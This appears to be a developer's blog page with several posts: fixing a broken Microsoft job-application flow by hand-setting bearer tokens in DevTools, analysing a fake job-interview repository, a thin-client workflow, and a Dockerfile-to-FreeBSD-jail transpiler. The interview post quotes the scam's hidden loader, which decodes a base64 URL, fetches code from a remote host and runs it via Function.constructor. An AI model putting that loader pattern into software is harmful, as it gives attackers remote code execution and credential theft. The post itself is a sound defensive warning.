Monday, October 27, 2025

Debugging Microsoft's Job Portal

Or: When applying for a job becomes a technical interview you didn't sign up for

TL;DR: Microsoft's job portal had a bug that prevented me from submitting my application. After some browser console detective work, I discovered missing bearer tokens, set strategic JavaScript breakpoints, and manually set authentication headers to get my resume through. The irony of debugging Microsoft's code to apply to Microsoft was not lost on me.

I was excited to apply for a position at Microsoft. Their job portal has a nice feature: you can import your resume directly from LinkedIn rather than uploading a PDF. Convenient, right? I clicked the import button, watched my information populate, and confidently hit "Upload."

And waited. And waited.

Nothing happened. The button was stuck in a loading state, spinning endlessly.

As any developer would do when faced with a broken web app, I opened the browser's Network tab. There it was: a request to gcsservices.careers.microsoft.com that was failing. I examined the request headers and immediately spotted the problem: Authorization: Bearer undefined

Ah yes, the classic "undefined" bearer token. Someone's authentication flow was broken. The frontend was trying to make an authenticated request, but the token wasn't being set properly.

I started looking through other requests in the Network tab and found several that did have valid bearer tokens. I copied one of these working tokens for later use. Now I needed to figure out where in the code this broken request was being made.

I searched through the loaded JavaScript files and found the culprit in a minified file called main.0805accee680294efbb3.js. The code looked like this:

e && e.headers && (e.headers.Authorization = "Bearer " + await (0,
r.gf)(),
e.headers["X-CorrelationId"] = i.$.telemetry.sessionId,
e.headers["X-SubCorrelationId"] = (0,
s.A)(),
t(e))

This is where the bearer token was supposed to be added to the request headers. The r.gf function was clearly supposed to retrieve the token, but it was returning undefined.

I set a breakpoint on this line using Chrome DevTools. When the breakpoint hit, I manually set the bearer token in the console:

e.headers.Authorization = "Bearer " + "[my-valid-token]"

Then I let the execution continue. Success! The resume uploaded. Victory, right? Not quite.

After uploading the resume, I tried to click "Save and continue" to move to the next step. More failed requests.

Back to the Network tab. This time, I noticed requests failing to a different domain: careers.microsoft.com (without the "gcsservices" subdomain). These requests also had bearer token issues, but here's the twist: they needed a different bearer token than the first set of requests. Microsoft's job portal was apparently using two separate authentication systems.

I searched through the JavaScript again and found where XMLHttpRequest headers were being set:

const o = Ee.from(r.headers).normalize();

This was in a different part of the codebase handling a different set of API calls. I set another breakpoint here. Now I had a two-token juggling act: when requests went to gcsservices.careers.microsoft.com, I set Token A, and when requests went to careers.microsoft.com, I set Token B.

With both breakpoints set and both tokens ready, I went through the application flow one more time, manually adding the appropriate token at each breakpoint. After juggling between Token A for gcsservices requests and Token B for careers.microsoft.com requests, it finally worked. I made it through to the next page.


There's something deliciously ironic about having to debug Microsoft's production code just to submit a job application to Microsoft. Oh, and did I mention? I was doing all of this on a Chromebook Flex. 😄

This reminded me of last year when I wanted to buy a book from an online store. Their checkout form was broken and wouldn't let me proceed to payment. So I opened the browser console, found the validation bug in their JavaScript, bypassed it, and successfully placed my order. Apparently, fixing broken web forms has become my unexpected superpower.

To the Microsoft Hiring Team

If you're reading this:

  • Can I haz job?

Did I need to spend an hour debugging a job application portal? No. Was it more interesting than just uploading a PDF? Absolutely. And hey, if nothing else, I got a good blog post out of it.

Have you ever had to debug something just to accomplish a simple task? Share your stories in the comments!

Friday, October 17, 2025

Almost exploited via a job interview assignment

Days ago someone reached out on LinkedIn claiming to represent Koinos Finance's hiring team. Christian Muaña said they were impressed with my background and wanted me to move forward for a Senior Software Engineer position.

The technical interview email came from "Andrew Watson, Senior Engineering Engineer at Koinos" (hire @ koinos .finance) and seemed professional enough. Complete a 45-minute take-home coding assessment, push results to a public repository, share the link. Two business days. Standard tech interview stuff.

BitBucket and VMs

Andrew sent a BitBucket link to what looked like a typical full-stack React project. Frontend, backend with Express, routing, the usual. Nothing immediately suspicious.

I clicked the BitBucket link; probably not great opsec, but I do use BitBucket. Instead of cloning to my local machine though, I spun up a Google Cloud VM. Call it paranoia or good practice, but something made me want to keep this at arm's length (well, it is something crypto related).

Good thing too. I found the malicious code by manually reviewing the files. Never even ran npm install or built the project.

Middleware secrets

Buried in the backend middleware, specifically the cookie handling code, I found something concerning.

The code fetched data from a remote URL (base64 encoded) via mocki .io, then passed the response to what looked like an innocent "error handler" function. But this wasn't error handling: it used JavaScript's Function.constructor to execute whatever code the remote server returned.

const errorHandler = (error) => {

    const createHandler = (errCode) => {

        const handler = new (Function.constructor)('require', errCode);

        return handler;

    };

    const handlerFunc = createHandler(error);

     handlerFunc(require);

}

axios.get(atob(COOKIE_URL)).then(

    res => errorHandler(res.data.cookie)

  );

The moment I would have started the backend server, it would have downloaded and executed arbitrary code from an attacker-controlled server. Environment variables, API keys, credentials, sensitive files, backdoors.

A win for manual code review.

What made it work

The sophistication is what gets me. This wasn't some obvious phishing email with broken English. Professional LinkedIn outreach. Realistic assignment structure. Hosted on BitBucket, a trusted platform. Actual working React code with malicious payload hidden in middleware.

The malicious code used innocent function names like errorHandler and getCookie, tucked away in middleware where most developers wouldn't scrutinize carefully. Who thoroughly audits every line of a take-home assignment before running it?

It's targeted at developers who regularly download and run unfamiliar code as part of their job. That's the genius of it.

The obvious signs

Looking back, the red flags were there:

  • Salary range mentioned immediately.
  • Extreme flexibility: part-time acceptable, even with a current job.
  • "Senior Engineering Engineer" is redundant.
  • Two business days for a 45-minute assessment creates artificial urgency.

But the real red flag was in the code: base64-encoded URLs, remote code execution patterns, obfuscated logic in what should be straightforward middleware.

What this means

This is part of a growing trend of supply chain attacks targeting developers. We're attractive targets because we routinely download and execute code, have access to sensitive systems, and work with valuable intellectual property.

The sophistication is increasing. Not just phishing emails anymore; fully functional applications with malicious code carefully hidden where it might go unnoticed. Hosted on legitimate platforms like BitBucket for added credibility.

The thing is, the better these attacks get, the more they exploit the fundamental nature of development work. We clone repositories. We run npm install. We execute code. That's the job.

So what do you do? Review code before running it. Use isolated environments: VMs, Docker containers, cloud instances. Use Chromebooks for work! Watch for obfuscation. Be suspicious of too-good-to-be-true offers. Trust your instincts.

That nagging feeling that made me use a VM instead of my local machine was spot-on.

Your security is worth more than any job opportunity.

Thursday, October 09, 2025

The Modern Thin Client

For years, the developer community has been locked in a quiet arms race over who has the most powerful laptop. I’ve stepped off that treadmill. My setup is a modern take on the thin client, and it has made my workflow more focused, secure, and flexible.

At its heart, the principle is simple: use a lean local machine that runs only a browser, a terminal, and Visual Studio Code. The core of the work happens on a more powerful computer, which is often just another machine in my home office, accessible over the local network. I use the terminal to SSH into it, and VS Code's Remote Development to edit files directly on that remote machine. The local device becomes a high-fidelity window into a more powerful computer, and since it all runs over the intranet, my work continues uninterrupted even if the internet goes down.

This philosophy is portable. I have a Chromebook that I leave at my in-laws, perfectly set up for this. At home, my primary machine is an older MacBook Pro that runs only Chrome, Terminal, and VSCode. Both devices are just different gateways to the same powerful remote workspace.

This approach has the soul of an old-school UNIX workstation but with a modern editor. The terminal is the control center, but instead of a monochrome vi session, you get the full VSCode experience with all its extensions, running seamlessly on remote files.

A major benefit is the built-in security isolation. In a traditional setup, every script and dependency runs on the same machine as your primary browser with all its logged-in sessions. Here, there's a clear boundary: the local machine is for "trusted" tasks like browsing, while the remote machine is for "untrusted" work. A malicious script on the server cannot touch local browser data.

The most significant power, however, is the ability to scale. I've had situations where I needed parallel builds of separate branches for a resource-heavy project. A single machine couldn't handle two instances at once. With this setup, it was trivial: one VSCode window was connected to a powerful machine running the develop branch, and a second VSCode window was connected to an entirely different server running the feature branch. Each had its own dedicated resources, something impossible with a single laptop.

This model redefines the role of your laptop. It’s not about having a less capable machine, but about building a more capable and resilient system. The power is on the servers, and the local device is just a perfect, secure window into it.

Monday, October 06, 2025

Building a Dockerfile Transpiler

I'm excited to share dxform, a side project I've been working on while searching for my next role: a Dockerfile transpiler that can transform containers between different base systems and generate FreeBSD jail configurations.

The concept started simple: what if Dockerfiles could serve as a universal format for defining not just Docker containers, but other containerization systems too? Specifically, I wanted to see if I could use Dockerfiles—which developers already know and love—as the input format for FreeBSD jails.

I have some background building transpilers from a previous job, so I knew the general shape of the problem. But honestly, I expected this to be a much larger undertaking. Two things made it surprisingly manageable:

Dockerfiles are small. Unlike general-purpose programming languages, Dockerfiles have a limited instruction set (FROM, RUN, COPY, ENV, etc.). This meant the core transpiler could stay focused and relatively compact.

AI-assisted development works (mostly). This project became an experiment in how much I could orchestrate AI versus writing code myself. I've been using AI tools so heavily I'm hitting weekly limits. The feedback has been fascinating: AI is surprisingly good at some tasks but still needs human architectural decisions. It's an odd mix where it gets things right and wrong in unexpected places.

Here's where complexity crept in: the biggest challenge wasn't the Dockerfile instructions themselves—it was parsing the shell commands inside RUN instructions.

When you write:

RUN apt-get update && apt-get install -y curl build-essential

The transpiler needs to understand that apt-get install command deeply enough to transform it to:

RUN apk update && apk add curl build-base

This meant building a shell command parser on top of the Dockerfile parser. I used mvdan.cc/sh for this, and it works beautifully for the subset of shell commands that appear in Dockerfiles.

dxform can currently transform between base systems (convert Debian/Ubuntu containers to Alpine and vice versa), translate package managers (automatically mapping ~70 common packages between apt and apk), and preserve your comments and structure.

The most interesting part is the FreeBSD target. The tool has two outputs: --target freebsd-build creates a shell script that sets up ZFS datasets and runs the build commands, while --target freebsd-jail emits the jail configuration itself. Together, these let you take a standard Dockerfile and deploy it to FreeBSD's native containerization system.

dxform transform --target freebsd-build Dockerfile > build.sh

dxform transform --target freebsd-jail Dockerfile > jail.conf

It's early days, but the potential is there: Dockerfiles as a universal container definition format, deployable to Docker or FreeBSD jails.

This is very much an experiment and a learning experience. The package mappings could be more comprehensive, the FreeBSD emitter could be more sophisticated, and there are surely edge cases I haven't encountered yet. But it works, and it demonstrates something compelling: with the right abstractions, we can build bridges between different containerization ecosystems.

The project is open source and ready for experimentation. Whether you're interested in cross-platform containers, FreeBSD jails, or the mechanics of building transpilers for domain-specific languages, I'd love to hear your thoughts.

Check out the project on GitHub to see the full source and try it yourself.

Debugging Microsoft's Job Portal

Or: When applying for a job becomes a technical interview you didn't sign up for TL;DR: Microsoft's job portal had a bug that prev...